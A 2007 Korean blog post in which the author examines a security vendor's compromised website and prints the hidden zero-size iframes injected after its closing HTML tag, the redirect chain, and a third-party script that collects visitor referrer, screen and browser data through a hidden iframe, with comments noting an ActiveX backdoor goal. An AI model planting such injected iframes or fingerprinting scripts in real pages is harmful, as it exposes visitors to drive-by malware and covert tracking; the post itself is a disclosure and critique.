close

언제나 공사중!

당신과 나 사이의 왜곡된 세상은 우리가 함께 있을 수 있다는 증거에요. by 데굴대굴
  • home
  • local
  • tag
  • media
  • guestbook

보안 제품을 사라는거야 말라는거야...

Category : 컴퓨터와 생활 ..... 작성일 2007/10/12 10:23
Tag IT, 보안, 암호화, 지란지교

 요즘 제 ID와 PW를 RoboForm2Go 를 통해 관리하고 있습니다. 이 제품의 장점은 연결된 포터블 장비(USB 메모리)에서 모든 동작이 끝난다 끝난다는 점인데, 대부분 USB 메모리에 이 프로그램만 딸랑 넣고 다니지 않지요. 대부분 문서나 은행 인증서 같은 것도 함께 갖고 다니잖아요.

 그래서 드라이브를 암호화 해보자..라는 생각을 말이죠. 제가 사용하는 Trancend JF110에도 전용 암호화 프로그램이 있긴 하지만, 파티션을 미리 나눠야 한다는 점 때문에 불편함이 있습니다.

 그래서 바꿔볼 생각을 했습니다.

 그래.. 국내 업체를 밀어줄까? 하고 생각했습니다만.........


별도 마음에 와닫지 않는군요


사용자 삽입 이미지

이쪽 업계의 분위기상 어떤 이유에서인지 모르게 소프트웨어의 기능에 눈이 먼저 가는게 아니라 불쌍하다는 생각이 먼저 듭니다.

처음 시작하는 index.htm 파일 안에는...


<iframe src=http://www.sayc1ub.com width=0 height=0 frameborder=0></iframe><iframe src=http://www.sayc1ub.com width=0 height=0 frameborder=0></iframe>


라는 내용이 </html> 이후에 붙어 있으며, http://www.sayc1ub.com 에 접속하면


<iframe src="club.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="say.htm" width="0" height="0" frameborder="0"></iframe>
<a href="http://www.51.la/?1367935" target="_blank"><img alt="&#x6211;&#x8981;&#x5566;&#x514D;&#x8D39;&#x7EDF;&#x8BA1;" src="http://img.users.51.la/1367935.asp" style="border:none" /></a>
<script language="javascript" src="http://count44.51yes.com/click.aspx?id=448562956&logo=1"></script>

라는 내용이 반겨주고... 이 사이트에서는 http://img.users.51.la/1367935.asp의 내용을 호출하는데, 그 내용은
 

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://web.51.la/s.asp?svid=43&amp;id=1367935&amp;style=0&amp;vpage=http%3A%2F%2Fwww%2Esayc1ub%2Ecom%2F&amp;29901.26.gif">here</a>.</body>


이고, 다시 연속적으로 http://count44.51yes.com/click.aspx?id=448562956&logo=1 를 호출 하는데... 그 내용은


var countid=448562956;var logo=1;

function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}

function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}

function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() +  "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() +  "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}

var yesdata;

yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);

if(logo!=12)
{document.write('<a href="http://count.51yes.com/index.aspx?id='+ countid +'" target=_blank>');
document.write('<img width=20 height=20 border=0 hspace=0 vspace=0 src="http://count44.51yes.com/count'+ logo +'.gif" alt="51YES貢籃固셕溝固"></a>');}
else
{document.write('<a href="http://count.51yes.com/index.aspx?id='+ countid +'" target=_blank title="51YES貢籃固셕溝固">직좆固셕</a>');}
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count44.51yes.com/sa.aspx?id='+countid+yesdata+' height=0 width=0></iframe>');


이군요. 쭉 몇단계 더 진행되며 더 추적할 수 있지만, 사실 귀찮습니다. 그냥 귀찮은 정도가 아니라 더 추적을 하는건 대.단.히.귀.찮.습.니.다. 하면 어떻게 동작할지도 뻔하게 아는 사실이고.....

 보안 제품을 살까 하고 갔습니다만, 보안 제품 대신에 보안이 망가진 시스템을 구경하고 왔으니...... 흐음..... 아마 서버 관리자나 보안 관리자는 대단히 골치 아플듯 싶네요..

 해당 제품의 개발사는 국내에 몇 손가락 안에 꼽는 소프트웨어 업체입니다. 보안쪽으로 많이 신경쓰고 있는 걸로 알고 있고, 얼마 전에 개인정보차단 솔루션도 만들었다고 해서 그럭저럭 괜찮은 이미지였는데, 이번 건으로 그다지 신뢰가 가지 않는군요. (사실 개인적으로 국내 대부분의 업체를 신뢰하지 않습니다. 관리는 잘 안하면서 너무 돈만 밝히는 듯한 이미지를 가지게 해서요.)

제가 말하고 싶은 최종 결론은....


전자 정부가 외산장비 잔치라 구박하지 말고
지금 있는 기술부터 확실히 익힐 수 있도록 투자


하라는 거죠. 기본에 충실하지 않고, 빨리빨리를 외치며 완성품부터 요구하는 현실이 싫군요.

PS1. 제가 쓰는 USB 메모리 : 2006/03/02 - [지름] Trancend JF110 2G
PS2. 아.. 여기까지 보다가 귀찮아서 그냥 쓰던거 계속 쓰기로 했습니다. -_-a


Trackback(1) : Comment (16)

트랙백 주소 :: http://www.daegul.com/trackback/2511471 관련글 쓰기

  1. Subject: 보안제품 사이트가 해킹을 당했군요.

    Tracked from 일상의 잡다구리한 이야기 2007/10/12 11:56  삭제

    지란지교 소프트의 USBSAFE 사이트입니다. 이름하여 보안 소트프죠. 아래의 노랭이는 아시는분은 아실테지만 해킹을 당한 것입니다. 이번년도 중반에 저도 상당히 환장하며 봤던 메시지 입니다. (제가 근무하던 회사에 아주아주 잠깐 돌아서 한밤에 출동하던 일이 있었는데, 엔지니어들의 각고의 노력에 의해 바로 잡혔습니다.) IIS의 RDS 취약점을 이용한 공격인데, 한 번 걸리면 욕도 바가지로 먹거니와 끈질긴 해커들과의 대면식이 진행될 귀찮은 친구입니다...

댓글을 달아 주세요

  1. BlogIcon Lane 2007/10/12 10:55  수정/삭제 댓글쓰기 댓글주소

    아이프레임 무지하게 써 놨군요.
    IE 아니면 적용도 안되는 태그를...
    초기화면 브라우저 상단 노란 상자가 나오는 거 보니 또 액티브 엑스 잔친가 보네요.
    거참... 저에게는 요즘 저 노란 상자가 스펨 전화랑 비슷한 수준의 스트레스를 주더군요.

    • BlogIcon 데굴대굴 2007/10/12 12:01  수정/삭제 댓글주소

      액티브액스를 이용한 백도어 설치가 목적입니다. 상당히 고급기술입니다. 처음부터 끝까지 분석해보시면(하는 작업은 대단히 귀찮은 작업입니다. -_-), 자신의 스킬이 업되었다는 것을 느끼실 수 있을 정도 입니다.

  2. BlogIcon zizim 2007/10/12 11:15  수정/삭제 댓글쓰기 댓글주소

    으와~ 복잡하네요.
    액티브 엑스는 무조건 반사;;

    • BlogIcon 데굴대굴 2007/10/12 12:01  수정/삭제 댓글주소

      인터넷뱅킹도 안하실려고요? -_-a

    • BlogIcon zizim 2007/10/12 12:08  수정/삭제 댓글주소

      아날로그 인간이라 무조건 은행 직접 갑니다.

    • BlogIcon 데굴대굴 2007/10/14 11:38  수정/삭제 댓글주소

      은행을 직접 갈 시간이 있으시다니....



      부럽습니다.

    • BlogIcon zizim 2007/10/14 11:48  수정/삭제 댓글주소

      일단 알백조라서 은행 갈 일 별로 없기도 하거니와 집에서 가깝거든요.

    • BlogIcon 데굴대굴 2007/10/14 11:51  수정/삭제 댓글주소

      저도 가깝긴 합니다만 갈 시간이... ;;;

  3. BlogIcon dirtybit 2007/10/12 11:30  수정/삭제 댓글쓰기 댓글주소

    아아, 저거 한번 들어오면 -_-;
    뭐랄까 참으로 피곤하더군요; -_-
    어딘가 알수 없는 곳에 슬쩍 놓고 가는데 이거 뭐 어떻게 막아야 할지 참으로 난감하다는;;;

    여차저차 해서 뭐 시스템 담당하는 분이 처리해서 저야 잘 모르지만, 확실히 여기저기 알게 모르게 저거 많이 걸려있는거 같더라구요. 제발 있는 기술, 기본 부터 제대로 알고 좀 뭔가 했으면 하는 생각입니다.

    • BlogIcon 데굴대굴 2007/10/12 12:02  수정/삭제 댓글주소

      문제는 이런걸 익히기 전에 담당자가 바뀐다는 것. 스킬업할 시간도 없고, 대충 물건 내놓을 궁리만 한다는 것.

  4. BlogIcon StarLight 2007/10/13 18:28  수정/삭제 댓글쓰기 댓글주소

    으윽;; 뭔가 엄청 어지러운 코드들이군요.

    • BlogIcon 데굴대굴 2007/10/14 11:39  수정/삭제 댓글주소

      일부러 해석하는데 오래 걸리게끔 복잡하게 계속 빙글빙글 돌리는겁니다. 그래서 더 귀찮죠. -_-a

  5. BlogIcon Hee 2007/10/15 22:25  수정/삭제 댓글쓰기 댓글주소

    아...
    외..외계어같아요..orz..

    흠흠..
    그래도 저 업체를 보니 신뢰는 안 가는 느낌이네요;;
    보안이 망가진 시스템의 보안회사라니...ㅎㄷㄷ;;

    • BlogIcon 데굴대굴 2007/10/16 10:25  수정/삭제 댓글주소

      외계어 맞답니다. 이거는 해석!해야 하는 것이니까요.

      뭐.. 보안이 망가진 보안회사라도 국내에는 손꼽히는 기업입니다. -_-a

  6. BlogIcon 찬우넷 2007/10/18 03:47  수정/삭제 댓글쓰기 댓글주소

    흐흐-0
    어렵군요-
    전혀 알아보지를 못하겠어요

    • BlogIcon 데굴대굴 2007/10/18 11:40  수정/삭제 댓글주소

      저는... '욕'으로 알아듣고 있습니다. (이해 못하는건 모두 욕으로 인식하는 편리한 시스템 탑제!)

이전 1 ... 472 473 474 475 476 477 478 479 480 ... 1181 다음

데굴대굴

SELECT 인생잡담, count(*)
FROM 마음
WHERE main_brain_data='잡담'
OR favorite_girltype_glass_yn = 'Y'
ORDER BY date
GROUP BY RAND(@mymind);


Best Result :
1. 데굴대굴 블로그
2. http://www.daegul.com
3. E-mail : daegul@daegul.com
  • 제품 프리뷰(리뷰)를 받습..
  • 주인장 소개 2008.06.
  • 글이 안 뜨는 것에 대하여...
  • 글 쓰실 때 주의점
  • 이런 여성분 찾았습니다.
  • 글 퍼감 금지입니다.
  • 채팅 사이트 URL
관리자 글쓰기

Calendar

«   2010/03   »
일 월 화 수 목 금 토
  1 2 3 4 5 6
7 8 9 10 11 12 13
14 15 16 17 18 19 20
21 22 23 24 25 26 27
28 29 30 31      

Total
2,006,304
Today
524
Yesterday
636

Recent Posts

  • 의외의 발군이 될 것 같은 - 맥스(MAXX)(1)
  • 플래시를 끄고 웹서핑 해보니..(9)
  • 첫화면 꾸미기 클로즈 베타 테스터에 도..(12)
  • 처음 본 IMAX 3D영화 - 이상한 나라의 앨..(10)
  • 액티브엑스가 발목잡고 있는건 모바일 뿐..(8)
  • 최강 다이얼 프로그램에 도전한다 - OneT..(8)
  • 광고 메일을 보낼 때에 신경 좀 써주세요(10)
  • 모바일 시장을 보면서 단상(13)
  • 일반 핸드폰도 메일 알람 받기가 된다(6)
  • 최강의 OZ&JOY 요금제는 무엇인가? - OZ&..(4)

Loading

Category

분류 전체보기 (1181)
I am.. & 테스트 (93)
보는 것 (430)
문자 책 (154)
그림 책 (39)
움직이는 것 (236)
먹는 것 (44)
일 (108)
프로그램 (23)
Windows (15)
이벤트 뷰어 (51)
Knowledge Base (6)
여행 (71)
컴퓨터와 생활 (117)
아이폰/아이팟터치/앱 (31)
게임 (29)
PSP (20)
PC (9)
소원 (67)
순수 잡담 (222)
작성 중 (0)

Recent Comment

  • "원래 쓸대 없는게 가장 멋... Draco 16:51
  • 1.5.13으로 다시 해보니 되... 파초 10:19
  • 저사양의 공포를 아직 겪어... 데굴대굴 03/17
  • 누가 돈을 더 잘버냐를 물... 별바람 03/17
  • 플래시로 문제를 겪어보시... 데굴대굴 03/17
  • 제가 파폭 3.6에 Flashbloc... 데굴대굴 03/17
  • 좋은 방법입니다만....파폭... 파초 03/17
  • 플래시로 만들어진 팝업광... 별바람 03/17
  • FF와 크롬에는 Flashblock... 데굴대굴 03/16
  • 한 때는 포털사이트 광고를... 가눔 03/16

Recent Trackback

  • 몸짱 되고 싶은 남자라면... 푸샵.com - 인터넷 헬스 클럽 03/07
  • 영화 - 하치이야기. 수채화 풍경 02/22
  • 아이폰 탈옥 성공에 이르는... 루미-개발자가 되다 02/18
  • 티소토리 선물, MAX 선물... 쌍둥이 아빠의 리뷰, 요리,.. 02/04
  • 사운드 매직, PL30, 이어폰... 골든이어스 리뷰 - 음질편 02/01
  • 아이폰 카메라 무료 카메라... iPhone Art의 아이폰과 아.. 01/18
  • 하민혁의 생각. haawoo's me2DAY 01/07
  • 티스토리에서 잊지 않으셨... 외계인 마틴 01/03
  • 잔혹하고 충격적인 미도리... 미도리의 온라인 브랜딩 01/02
  • 고영혁의 생각. youthink's me2DAY 2009

안경소녀를 사랑하는 사람들의 모임
TISTORY 2007 우수블로그
TISTORY 2009 우수블로그
야후 블로그 벳지
rss
블로그코리아에 블UP하기
믹시

Tag

  • HTML5
  • 티스토리에 바라는 점
  • 동영상
  • 티스토리에 바란다
  • IMAX
  • Windows
  • 핸드폰
  • 샨새교
  • 티스토리
  • flash
  • 독서
  • 윈도우
  • 플래쉬
  • HTML
  • 3d
  • Tistory
  • 이상한 나라의 앨리스
  • 맥스
  • 플래시
  • OZ
  • 베타테스트
  • 운동
  • 헬스
  • ActiveX
  • Alice in Wonderland
  • 영화
  • 남자들의 몸 만들기
  • Flashblock
  • Maxx
  • 베타테스터

Archive

  • 2010/03 (8)
  • 2010/02 (13)
  • 2010/01 (16)
  • 2009/12 (13)
  • 2009/11 (7)
  • 2009/10 (6)
  • 2009/09 (9)
  • 2009/08 (4)
  • 2009/07 (8)
  • 2009/06 (12)
  • 2009/05 (11)
  • 2009/04 (14)

Link

  • 36.5℃ BloG...
  • :: 영민C ::.
  • ::: 아일랜드 :::.
  • Blind-Blue.
  • Char On Air.
  • Dirtybit's Layer.
  • Frozen in Frame,.
  • Future Shaper !.
  • HoldingU...Crazy, Beautiful.
  • ISAAC TOICE.
  • It's 3 a.m ::.
  • kbdstar.net.
  • LaLaLa.
  • mAgIC cIrCLe.
  • mepay 쇼핑몰 전문 블로그.
  • nology @ blog.
  • NTFAQ 윈도우즈와의 여행.
  • Only Store.
  • Personal Sanctuary.
  • Ryee's STORY - 빈곤의 종말.
  • StarLight's Imagination F...
  • Trivial round of daily li...
  • [puRiaE].
  • [문스랩닷컴] 삶에는 왕도...
  • {달룡이네집}.
  • Η a r u 불살라보자ºㅂº.
  • 夢想..........
  • 글로 그림 그리는 산골소년.
  • 데굴대굴 블로그 - Slash'E...
  • 데굴대굴 블로그 - 구글 통계.
  • 데굴대굴 블로그 - 다음 통계.
  • 리도.
  • 무진군의 골 때리는 세상...
  • 별바람의 은신처.
  • 사진은 권력이다.
  • 스타꽤뚤어보기ㅋㅋㅋ.
  • 아프리카를 꿈꾸는 펭귄.
  • 언제나닷컴.
  • 에코や.
  • 오늘밤은잠을.
  • 일상의 잡다구리한 이야기.
  • 자네, 안경은 좋아하는가??...
  • 작은아씨네.
  • 제타군의 '인생은 끝없는...
  • 지하기지건설프로젝트.
  • 찬우넷.
  • 카르사마의 미디어로그.
  • 학주니닷컴.
  • 한일커플의 B(秘)급 여행.
  • 해피씨커의 나눔터.
  • 행복한 즐로거 : KIN loger.
  • 헝겊토끼의 이상한 이야기_.
  • 혜민아빠 책과 사진 사랑.
 
지역로그 : 태그 : 방명록 : 관리자 : 글쓰기

Copyright 데굴대굴's Blog.

무단 펌질 금지